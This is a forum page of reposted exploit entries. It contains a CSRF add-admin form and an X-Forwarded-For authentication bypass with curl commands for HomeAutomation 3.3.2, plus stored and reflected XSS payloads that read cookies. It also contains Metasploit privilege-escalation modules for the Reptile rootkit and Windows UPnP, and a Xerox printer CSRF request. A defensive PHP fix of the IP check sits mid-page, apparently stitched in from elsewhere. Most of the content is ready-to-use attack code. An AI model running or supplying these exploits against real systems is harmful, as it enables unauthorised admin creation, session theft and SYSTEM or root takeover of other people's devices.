
Everything posted by HireHackking
-
HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)
# Exploit: HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5558
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php

HomeAutomation v3.3.2 CSRF Add Admin Exploit

Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2

Summary: HomeAutomation is an open-source web interface and scheduling
solution. It was initially made for use with the Telldus TellStick, but is
now based on a plugin system and, besides the TellStick, also supports
Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices
(switches, dimmers, etc.) based on an advanced scheduling system, taking
into account things like measurements from various sensors. With the
houseplan view you get a simple overview of the status of your devices at
their location in your house.

Desc: The application interface allows users to perform certain actions via
HTTP requests without performing any validity checks to verify the requests.
This can be exploited to perform certain actions with administrative
privileges if a logged-in user visits a malicious web site.

Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
           Apache/2.4.29 (Ubuntu)
           PHP/7.4.0RC4
           PHP/7.3.11
           PHP 7.2.24-0ubuntu0.18.04.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2019-5558
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5558.php

06.11.2019

--

<html>
  <body>
    <form action="http://localhost/homeautomation_v3_3_2/?page=conf-usercontrol" method="POST">
      <input type="hidden" name="id" value="-1" />
      <input type="hidden" name="action" value="save" />
      <input type="hidden" name="editable" value="2" />
      <input type="hidden" name="username" value="testingus" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="firstname" value="Tester" />
      <input type="hidden" name="lastname" value="Testovski" />
      <input type="hidden" name="email" value="test@zeroscience.mk" />
      <input type="hidden" name="userlevel" value="3" />
      <input type="hidden" name="save" value="Save" />
      <input type="submit" value="Addmoi" />
    </form>
  </body>
</html>
-
HomeAutomation 3.3.2 - Authentication Bypass
# Exploit: HomeAutomation 3.3.2 - Authentication Bypass
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5557
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php

HomeAutomation v3.3.2 Authentication Bypass Exploit

Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2

Summary: HomeAutomation is an open-source web interface and scheduling
solution. It was initially made for use with the Telldus TellStick, but is
now based on a plugin system and, besides the TellStick, also supports
Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices
(switches, dimmers, etc.) based on an advanced scheduling system, taking
into account things like measurements from various sensors. With the
houseplan view you get a simple overview of the status of your devices at
their location in your house.

Desc: The application suffers from an authentication bypass vulnerability.
Spoofing the client IP address with a local (loopback) value in the
X-Forwarded-For header satisfies the isIpLocal() autologin check, allowing
remote control of the smart home solution.

===============================================================================

/modules/login/login.module.php:
--------------------------------

19: if(!defined("HomeAutomationIncluded")) { die("HomeAutomation: Direct access not premitted"); }
20: 
21: if($_SESSION[CFG_SESSION_KEY]["userlevel"] < 1 && $action == "default" && isIpLocal() && getFormVariable("autologin", "") == "")
22: {
23:   // if user is not logged in and action is default, user is visiting locally and autologin is NOT set, allow autologin.
24:   $action = "login";
25: }
26: 
27: ?>

===============================================================================

/functions.php:
---------------

733: function isIpLocal() {
734: 
735:   if(substr(getIpAddress(), 0, 4) == "127.") {
736:     return true;
737:   }
738: 
739:   $isIpLocal = false;
740: 
741:   $localip = $_SESSION[CFG_SESSION_KEY]["settings"]["localip"];
742: 
743:   $localnets = explode(";", $localip);
744:   foreach($localnets as $localnet) {
745:     list($localnet, $localmask) = explode("/", $localnet);
746:     if($localmask == "") {
747:       $localmask = 32;
748:     }
749:     if($localmask == "" || $localmask > 32 || $localmask < 0) {
750:       $localmask = 32;
751:     }
752: 
753:     // $mask = $localmask;
754: 
755:     $localnet = ip2long($localnet);
756:     $localmask = ~((1 << (32-$localmask)) - 1);
757:     $remoteip = ip2long(getIpAddress());
758:     $maskedip = $remoteip & $localmask;
759:     $maskednet = $localnet & $localmask;
760: 
761:     // echo "<br />localnet:";
762:     // printf('%1$32b', $localnet);
763: 
764:     // echo "<br />localmask: (dec: ".$mask.")";
765:     // printf('%1$32b', $localmask);
766: 
767:     // echo "<br />remoteip:";
768:     // printf('%1$32b', $remoteip);
769: 
770:     // echo "<br />maskedip:";
771:     // printf('%1$32b', $maskedip);
772: 
773:     // echo "<br />maskednet:";
774:     // printf('%1$32b', $maskednet);
775: 
776:     if($maskedip == $maskednet) {
777:       // echo "<br />maskedip == maskednet";
778:       $isIpLocal = true;
779:       break;
780:     }
781:   }
782:   // $isIpLocal = false;
783:   return $isIpLocal;
784: }
785: 
786: function getIpAddress() {
787:   return isset($_SERVER["HTTP_X_FORWARDED_FOR"]) ? $_SERVER["HTTP_X_FORWARDED_FOR"] : $_SERVER["REMOTE_ADDR"];
788: }

===============================================================================

Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
           Apache/2.4.29 (Ubuntu)
           PHP/7.4.0RC4
           PHP/7.3.11
           PHP 7.2.24-0ubuntu0.18.04.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2019-5557
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5557.php

06.11.2019

--

PoC auth bypass and arbitrary cookie setup, grepping auth'd content view:
------------------------------------------------------------------------

root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -H "X-Forwarded-For: 127.31.33.7" -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
*   Trying 192.168.2.113...
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
* found 696 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
*        server certificate verification SKIPPED
*        server certificate status verification SKIPPED
*        common name: n28.nux.se (does not match '192.168.2.113')
*        server certificate expiration date OK
*        server certificate activation date OK
*        certificate public key: RSA
*        certificate version: #3
*        subject: CN=n28.nux.se
*        start date: Mon, 21 Oct 2019 12:18:27 GMT
*        expire date: Sun, 19 Jan 2020 12:18:27 GMT
*        issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
*        compression: NULL
* ALPN, server accepted to use http/1.1
> GET /index.php HTTP/1.1
> Host: 192.168.2.113
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
> Accept: */*
> Cookie: PHPSESSID=11111111110000000000666666
> X-Forwarded-For: 127.31.33.7
> 
< HTTP/1.1 303 See Other
< Date: Wed, 20 Nov 2019 01:06:16 GMT
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
< X-Powered-By: PHP/7.3.11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Strict-Transport-Security: max-age=63072000; includeSubdomains
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Location: ./index.php?page=houseplan
< Content-Length: 0
< Content-Type: text/html; charset=UTF-8
< 
* Connection #0 to host 192.168.2.113 left intact
* Issue another request to this URL: 'https://192.168.2.113/index.php?page=houseplan'
* Found bundle for host 192.168.2.113: 0x55c160ef7c40 [can pipeline]
* Re-using existing connection! (#0) with host 192.168.2.113
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
> GET /index.php?page=houseplan HTTP/1.1
> Host: 192.168.2.113
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
> Accept: */*
> Cookie: PHPSESSID=11111111110000000000666666
> X-Forwarded-For: 127.31.33.7
> 
< HTTP/1.1 200 OK
< Date: Wed, 20 Nov 2019 01:06:16 GMT
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
< X-Powered-By: PHP/7.3.11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Strict-Transport-Security: max-age=63072000; includeSubdomains
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
< 
{ [6 bytes data]
* </li><li>| <a href="./index.php?page=macros">Macros</a>
Connection #0 to host 192.168.2.113 left intact

root@kali:~/homeautomation# curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/index.php -vL --cookie "PHPSESSID=11111111110000000000666666" |grep Macros
*   Trying 192.168.2.113...
* Connected to 192.168.2.113 (192.168.2.113) port 443 (#0)
* found 173 certificates in /etc/ssl/certs/ca-certificates.crt
* found 696 certificates in /etc/ssl/certs
* ALPN, offering h2
* ALPN, offering http/1.1
* SSL connection using TLS1.2 / ECDHE_RSA_AES_128_GCM_SHA256
*        server certificate verification SKIPPED
*        server certificate status verification SKIPPED
*        common name: n28.nux.se (does not match '192.168.2.113')
*        server certificate expiration date OK
*        server certificate activation date OK
*        certificate public key: RSA
*        certificate version: #3
*        subject: CN=n28.nux.se
*        start date: Mon, 21 Oct 2019 12:18:27 GMT
*        expire date: Sun, 19 Jan 2020 12:18:27 GMT
*        issuer: C=US,O=Let's Encrypt,CN=Let's Encrypt Authority X3
*        compression: NULL
* ALPN, server accepted to use http/1.1
> GET /index.php HTTP/1.1
> Host: 192.168.2.113
> User-Agent: ZSL/0.2 (SpoofDetect 1.0)
> Accept: */*
> Cookie: PHPSESSID=11111111110000000000666666
> 
< HTTP/1.1 200 OK
< Date: Wed, 20 Nov 2019 01:06:25 GMT
< Server: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
< X-Powered-By: PHP/7.3.11
< Expires: Thu, 19 Nov 1981 08:52:00 GMT
< Cache-Control: no-store, no-cache, must-revalidate
< Pragma: no-cache
< Strict-Transport-Security: max-age=63072000; includeSubdomains
< X-Frame-Options: DENY
< X-Content-Type-Options: nosniff
< Transfer-Encoding: chunked
< Content-Type: text/html; charset=UTF-8
< 
{ [6 bytes data]
</li><li>| <a href="./index.php?page=macros">Macros</a>
* Connection #0 to host 192.168.2.113 left intact
root@kali:~/homeautomation# 

PoC auth bypass retrieving valid Cookie:
-----------------------------------------

root@kali:~/homeautomation# $(curl -sk --user-agent "ZSL/0.2 (SpoofDetect 1.0)" https://192.168.2.113/?page=houseplan -L -H "X-Forwarded-For: 127.1.1.1" --cookie-jar cookies.txt -o /dev/null) ; echo -ne "Your cookie: " ;tail -c -27 cookies.txt
Your cookie: k4dic6crpr4d4u71tr13gvtmsv
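The root cause above is that getIpAddress() trusts X-Forwarded-For from any TCP peer, so isIpLocal() can be satisfied by a header the client wrote itself. The following is an added example (not HomeAutomation's code) of how the two functions can be rewritten so the header is honoured only when the peer is a configured reverse proxy and can never make a request look like loopback; TRUSTED_PROXIES and the $localNets argument are assumptions standing in for the application's "localip" setting.

```php
<?php
// Added example, not the vendor's code. TRUSTED_PROXIES is a hypothetical
// operator-configured list of reverse-proxy CIDRs that may set X-Forwarded-For.
const TRUSTED_PROXIES = ['192.168.2.1/32'];

// True if the dotted-quad $ip lies inside $cidr ("a.b.c.d/n", /32 if omitted).
// Unlike the original, the mask is clamped to 32 bits so the comparison is
// correct on 64-bit PHP and invalid input is rejected instead of matched.
function ipInCidr(string $ip, string $cidr): bool {
    [$net, $bits] = array_pad(explode('/', $cidr, 2), 2, '32');
    if (!ctype_digit($bits) || (int)$bits > 32) {
        return false;
    }
    $bits    = (int)$bits;
    $ipLong  = ip2long($ip);
    $netLong = ip2long($net);
    if ($ipLong === false || $netLong === false) {
        return false;
    }
    $mask = $bits === 0 ? 0 : (~((1 << (32 - $bits)) - 1)) & 0xFFFFFFFF;
    return ($ipLong & $mask) === ($netLong & $mask);
}

function isTrustedProxy(string $peer): bool {
    foreach (TRUSTED_PROXIES as $cidr) {
        if (ipInCidr($peer, $cidr)) {
            return true;
        }
    }
    return false;
}

// Resolve the client address. $peer is $_SERVER['REMOTE_ADDR'];
// $xff is $_SERVER['HTTP_X_FORWARDED_FOR'] or null when absent.
function resolveClientIp(string $peer, ?string $xff): string {
    if ($xff === null || !isTrustedProxy($peer)) {
        return $peer;               // header from an untrusted peer: ignore it
    }
    // A proxy appends the address it actually saw as the LAST element; earlier
    // elements are client-controlled. Walk from the right and take the first
    // hop that is not itself one of our proxies.
    $hops = array_reverse(array_map('trim', explode(',', $xff)));
    foreach ($hops as $hop) {
        if (filter_var($hop, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) === false) {
            return $peer;           // malformed header: fall back to the peer
        }
        if (!isTrustedProxy($hop)) {
            return $hop;
        }
    }
    return $peer;                   // every hop was a proxy: trust nothing else
}

// Replacement for the original isIpLocal(). $localNets is the parsed
// "localip" setting (array of CIDRs) rather than a $_SESSION lookup.
function isIpLocal(string $peer, ?string $xff, array $localNets): bool {
    $client = resolveClientIp($peer, $xff);
    if (ipInCidr($client, '127.0.0.0/8')) {
        // Loopback counts only when the TCP peer itself is loopback; a
        // forwarded 127.x address is never accepted as local.
        return $peer === $client;
    }
    foreach ($localNets as $net) {
        if (ipInCidr($client, $net)) {
            return true;
        }
    }
    return false;
}

// Constructed requests for demonstration (addresses are made up):
$localNets = ['192.168.2.0/24'];
$cases = [
    'direct internet peer, spoofed loopback header' => ['203.0.113.10', '127.31.33.7'],
    'trusted proxy forwarding a spoofed loopback'   => ['192.168.2.1', '127.31.33.7, 203.0.113.10'],
    'trusted proxy, header is only a loopback claim' => ['192.168.2.1', '127.1.1.1'],
    'real loopback peer, no header'                  => ['127.0.0.1', null],
    'LAN peer, no header'                            => ['192.168.2.50', null],
];
foreach ($cases as $label => [$peer, $xff]) {
    printf("%-48s -> %s\n", $label, isIpLocal($peer, $xff, $localNets) ? 'local' : 'not local');
}
```

Only the two requests that arrive from a loopback or LAN peer without relying on the header are treated as local; the spoofed-loopback variants, including the one relayed through the trusted proxy, are not.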
-
Reptile Rootkit - reptile_cmd Privilege Escalation (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::Linux::Priv
  include Msf::Post::Linux::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Reptile Rootkit reptile_cmd Privilege Escalation',
      'Description'    => %q{
        This module uses Reptile rootkit's `reptile_cmd` backdoor executable
        to gain root privileges using the `root` command.

        This module has been tested successfully with Reptile from `master`
        branch (2019-03-04) on Ubuntu 18.04.3 (x64) and Linux Mint 19 (x64).
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'f0rb1dd3n', # Reptile
          'bcoles'     # Metasploit
        ],
      'DisclosureDate' => '2018-10-29', # Reptile first stable release
      'References'     =>
        [
          ['URL', 'https://github.com/f0rb1dd3n/Reptile'],
          ['URL', 'https://github.com/f0rb1dd3n/Reptile/wiki/Usage']
        ],
      'Platform'       => ['linux'],
      'Arch'           => [ARCH_X86, ARCH_X64],
      'SessionTypes'   => ['shell', 'meterpreter'],
      'Targets'        => [['Auto', {}]],
      'Notes'          =>
        {
          'Reliability' => [ REPEATABLE_SESSION ],
          'Stability'   => [ CRASH_SAFE ]
        },
      'DefaultTarget'  => 0))
    register_options [
      OptString.new('REPTILE_CMD_PATH', [true, 'Path to reptile_cmd executable', '/reptile/reptile_cmd'])
    ]
    register_advanced_options [
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
    ]
  end

  def reptile_cmd_path
    datastore['REPTILE_CMD_PATH']
  end

  def base_dir
    datastore['WritableDir'].to_s
  end

  def upload(path, data)
    print_status "Writing '#{path}' (#{data.size} bytes) ..."
    rm_f path
    write_file path, data
    register_file_for_cleanup path
  end

  def upload_and_chmodx(path, data)
    upload path, data
    chmod path
  end

  def check
    unless executable? reptile_cmd_path
      vprint_error "#{reptile_cmd_path} is not executable"
      return CheckCode::Safe
    end
    vprint_good "#{reptile_cmd_path} is executable"

    res = cmd_exec("echo id|#{reptile_cmd_path} root").to_s.strip
    vprint_status "Output: #{res}"

    if res.include?('You have no power here!')
      vprint_error 'Reptile kernel module is not loaded'
      return CheckCode::Safe
    end

    unless res.include?('root')
      vprint_error 'Reptile is not installed'
      return CheckCode::Safe
    end

    vprint_good 'Reptile is installed and loaded'
    CheckCode::Vulnerable
  end

  def exploit
    unless check == CheckCode::Vulnerable
      unless datastore['ForceExploit']
        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
      end
      print_warning 'Target does not appear to be vulnerable'
    end

    if is_root?
      unless datastore['ForceExploit']
        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
      end
    end

    unless writable? base_dir
      fail_with Failure::BadConfig, "#{base_dir} is not writable"
    end

    payload_name = ".#{rand_text_alphanumeric 8..12}"
    payload_path = "#{base_dir}/#{payload_name}"

    upload_and_chmodx payload_path, generate_payload_exe

    print_status 'Executing payload...'
    res = cmd_exec "echo '#{payload_path}&' | #{reptile_cmd_path} root & echo "
    vprint_line res
  end
end
-
Microsoft UPnP - Local Privilege Elevation (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/windows/priv'
require 'msf/core/post/windows/registry'
require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::Common
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Exploit::EXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Microsoft UPnP Local Privilege Elevation Vulnerability',
      'Description'    => %q(
        This exploit uses two vulnerabilities to execute a command as an elevated user.
        The first (CVE-2019-1405) uses the UPnP Device Host Service to elevate to
        NT AUTHORITY\LOCAL SERVICE
        The second (CVE-2019-1322) leverages the Update Orchestrator Service to
        elevate from NT AUTHORITY\LOCAL SERVICE to NT AUTHORITY\SYSTEM.
      ),
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'NCC Group',   # Original discovery (https://www.nccgroup.trust/uk/)
          'hoangprod',   # PoC
          'bwatters-r7'  # msf module
        ],
      'Platform'       => ['win'],
      'SessionTypes'   => ['meterpreter'],
      'Targets'        =>
        [
          ['Windows x64', { 'Arch' => ARCH_X64 }]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Nov 12 2019',
      'References'     =>
        [
          ['CVE', '2019-1322'],
          ['CVE', '2019-1405'],
          ['EDB', '47684'],
          ['URL', 'https://github.com/apt69/COMahawk'],
          ['URL', 'https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2019/november/cve-2019-1405-and-cve-2019-1322-elevation-to-system-via-the-upnp-device-host-service-and-the-update-orchestrator-service/'],
          ['URL', 'https://fortiguard.com/threat-signal-report/3243/new-proof-of-concept-combining-cve-2019-1322-and-cve-2019-1405-developed-1']
        ],
      'DefaultOptions' =>
        {
          'DisablePayloadHandler' => false
        }
    ))
    register_options([
      OptString.new('EXPLOIT_NAME', [false, 'The filename to use for the exploit binary (%RAND% by default).', nil]),
      OptString.new('PAYLOAD_NAME', [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
      OptString.new('WRITABLE_DIR', [false, 'Path to write binaries (%TEMP% by default).', nil]),
      OptInt.new('EXPLOIT_TIMEOUT', [true, 'The number of seconds to wait for exploit to finish running', 60]),
      OptInt.new('EXECUTE_DELAY', [true, 'The number of seconds to delay between file upload and exploit launch', 3])
    ])
  end

  def exploit
    exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha(6..14)
    payload_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(6..14)
    exploit_name = "#{exploit_name}.exe" unless exploit_name.end_with?('.exe')
    payload_name = "#{payload_name}.exe" unless payload_name.end_with?('.exe')
    temp_path = datastore['WRITABLE_DIR'] || session.sys.config.getenv('TEMP')
    payload_path = "#{temp_path}\\#{payload_name}"
    exploit_path = "#{temp_path}\\#{exploit_name}"
    payload_exe = generate_payload_exe

    # Check target
    vprint_status("Checking Target")
    validate_active_host
    validate_target
    fail_with(Failure::BadConfig, "#{temp_path} does not exist on the target") unless directory?(temp_path)

    # Upload Exploit
    vprint_status("Uploading exploit to #{sysinfo['Computer']} as #{exploit_path}")
    ensure_clean_destination(exploit_path)
    exploit_bin = exploit_data('cve-2019-1322', 'CVE-2019-1322-EXE.exe')
    write_file(exploit_path, exploit_bin)
    print_status("Exploit uploaded on #{sysinfo['Computer']} to #{exploit_path}")

    # Upload Payload
    vprint_status("Uploading Payload")
    ensure_clean_destination(payload_path)
    write_file(payload_path, payload_exe)
    print_status("Payload (#{payload_exe.length} bytes) uploaded on #{sysinfo['Computer']} to #{payload_path}")
    print_warning("This exploit requires manual cleanup of the payload #{payload_path}")

    # Run Exploit
    vprint_status("Running Exploit")
    print_status("It may take a moment after the session is established for the exploit to exit safely.")
    begin
      cmd_exec('cmd.exe', "/c #{exploit_path} #{payload_path}", 60)
    rescue Rex::TimeoutError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      print_error("Caught timeout. Exploit may be taking longer or it may have failed.")
    end
    vprint_status("Cleaning up #{exploit_path}")
    ensure_clean_destination(exploit_path)
  end

  def validate_active_host
    begin
      print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
    rescue Rex::Post::Meterpreter::RequestError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      raise Msf::Exploit::Failed, 'Could not connect to session'
    end
  end

  def validate_target
    if sysinfo['Architecture'] == ARCH_X86
      fail_with(Failure::NoTarget, 'Exploit code is 64-bit only')
    end
    sysinfo_value = sysinfo['OS']
    build_num = sysinfo_value.match(/\w+\d+\w+(\d+)/)[0].to_i
    vprint_status("Build Number = #{build_num}")
    unless sysinfo_value =~ /10/ && (build_num > 17133 && build_num < 18362)
      fail_with(Failure::NotVulnerable, 'The exploit only supports Windows 10 build versions 17133-18362')
    end
  end

  def ensure_clean_destination(path)
    return unless file?(path)

    print_status("#{path} already exists on the target. Deleting...")
    begin
      file_rm(path)
      print_status("Deleted #{path}")
    rescue Rex::Post::Meterpreter::RequestError => e
      elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
      print_error("Unable to delete #{path}")
    end
  end
end
-
HomeAutomation 3.3.2 - Persistent Cross-Site Scripting
# Exploit: HomeAutomation 3.3.2 - Persistent Cross-Site Scripting
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: Tom Rosenback and Daniel Malmgren
# Product web page: http://karpero.mine.nu/ha/
# Affected version: 3.3.2
# Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
# Advisory ID: ZSL-2019-5556
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php

HomeAutomation v3.3.2 Stored and Reflected XSS

Vendor: Tom Rosenback and Daniel Malmgren
Product web page: http://karpero.mine.nu/ha/
Affected version: 3.3.2

Summary: HomeAutomation is an open-source web interface and scheduling
solution. It was initially made for use with the Telldus TellStick, but is
now based on a plugin system and, besides the TellStick, also supports
Crestron, OWFS and Z-Wave (using OpenZWave). It controls your devices
(switches, dimmers, etc.) based on an advanced scheduling system, taking
into account things like measurements from various sensors. With the
houseplan view you get a simple overview of the status of your devices at
their location in your house.

Desc: HomeAutomation suffers from multiple stored and reflected XSS
vulnerabilities: input passed via several parameters to several scripts is
not properly sanitized before being returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser
session in the context of an affected site.

Tested on: Apache/2.4.41 (centos) OpenSSL/1.0.2k-fips
           Apache/2.4.29 (Ubuntu)
           PHP/7.4.0RC4
           PHP/7.3.11
           PHP 7.2.24-0ubuntu0.18.04.1

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2019-5556
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5556.php

06.11.2019

--

Reflected XSS:
--------------

https://192.168.2.113/?page=houseplan&autologin=1&msg=eyJpZCI6IiIsInRleHQiOiI8bWFycXVlZT50ZXN0PC9tYXJxdWVlPlVzZXJuYW1lIG9yIHBhc3N3b3JkIHdyb25nIiwiYWRkaXRpb25hbFRleHQiOiIiLCJ0eXBlIjoiZXJyb3IiLCJhdXRvQ2xvc2UiOmZhbHNlLCJzaG93T25seUluRGVidWciOmZhbHNlfQ==

Stored XSS:
-----------

POST /homeautomation_v3_3_2/?page=conf-macros HTTP/1.1
Host: localhost
Connection: keep-alive
Content-Length: 998
Cache-Control: max-age=0
Origin: http://localhost
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryq4LcgA7mbqElCW4q
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36
Sec-Fetch-User: ?1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Referer: http://localhost/homeautomation_v3_3_2/?page=conf-macros&action=edit&id=-1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: HomeAutomation_user=admin; HomeAutomation_hash=842427e5fc831255d7aa811b70e64957; PHPSESSID=ldcipit064rfp5l8rtcah091og

------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="id"

-1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="action"

save
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="name"

XSS
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="comment"

"><script>confirm(document.cookie)</script>
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="icon_on"; filename=""
Content-Type: application/octet-stream


------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="scenario"

1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="devices[0]"

1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="statuses[0]"

1
------WebKitFormBoundaryq4LcgA7mbqElCW4q
Content-Disposition: form-data; name="save"

Save
------WebKitFormBoundaryq4LcgA7mbqElCW4q--
-
XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)
# Exploit Title: XEROX WorkCentre 6655 Printer - Cross-Site Request Forgery (Add Admin)
# Date: 2018-12-19
# Exploit Author: Ismail Tasdelen
# Vendor Homepage: https://www.xerox.com/
# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/workcentre-6655
# Software : Xerox Printer
# Product Version: WorkCentre® 6655
# Vulnerability Type : Cross-Site Request Forgery (Add Admin)
# Vulnerability : Cross-Site Request Forgery
# CVE : N/A

# Description :
# The CSRF vulnerability was discovered in the WorkCentre® 6655 printer model of Xerox printer hardware.
# A request to add users is made in the Device User Database form field. This request is captured by
# the proxy, and a CSRF PoC HTML file is prepared. Xerox WorkCentre® 6655 printers allow CSRF. A request
# to add users is made in the Device User Database form field to the xerox.set URI.
# (The frmUserName value must have a unique name.)

HTTP POST Request :

POST /dummypost/xerox.set HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 494
Origin: https://server
Connection: close
Referer: https://server/properties/authentication/UserEdit.php?x=&isRoles=True&isPassword=True&isCreate=True&crumb1=UserManager%3Fx%3D%26sort%3DFname%26order%3DUp
Cookie: PHPSESSID=d7c4d8f8efe7dd919e6d0f5c93ec16cd; PageToShow=; statusSelected=n1; statusNumNodes=9; frmFirstName=%22%3E%3Ch1%3Ea; frmLastName=%22%3E%3Ch1%3Ea; frmCompany=%22%3E%3Ch1%3Ea; frmDisplayName=%22%3E%3Ch1%3Ea%2C%20%22%3E%3Ch1%3Ea; frmEmail=test@test.com; frmIFax=324324324324; frmFaxNumber=324324324324; frmFriendlyName=; frmProtocol=SMB; frmXrxAdd_1=Ipv4; frmDocumentPath=; frmLoginName=; frmServerName=; frmServerVolume=; frmNdsTree=; frmNdsContext=; frmSmbShare=; frmHnAdd_1=; frmIpv4_1_1=0; frmIpv4_1_2=0; frmIpv4_1_3=0; frmIpv4_1_4=0; frmIpv6_Host_1=%3A%3A; WebTimerPopupID=4; propSelected=n28; propNumNodes=117; propHierarchy=000100000000000000000000000; LastPage=/properties/authentication/UserEdit.php%3F%26isRoles%3DTrue%26isPassword%3DTrue%26isCreate%3DTrue
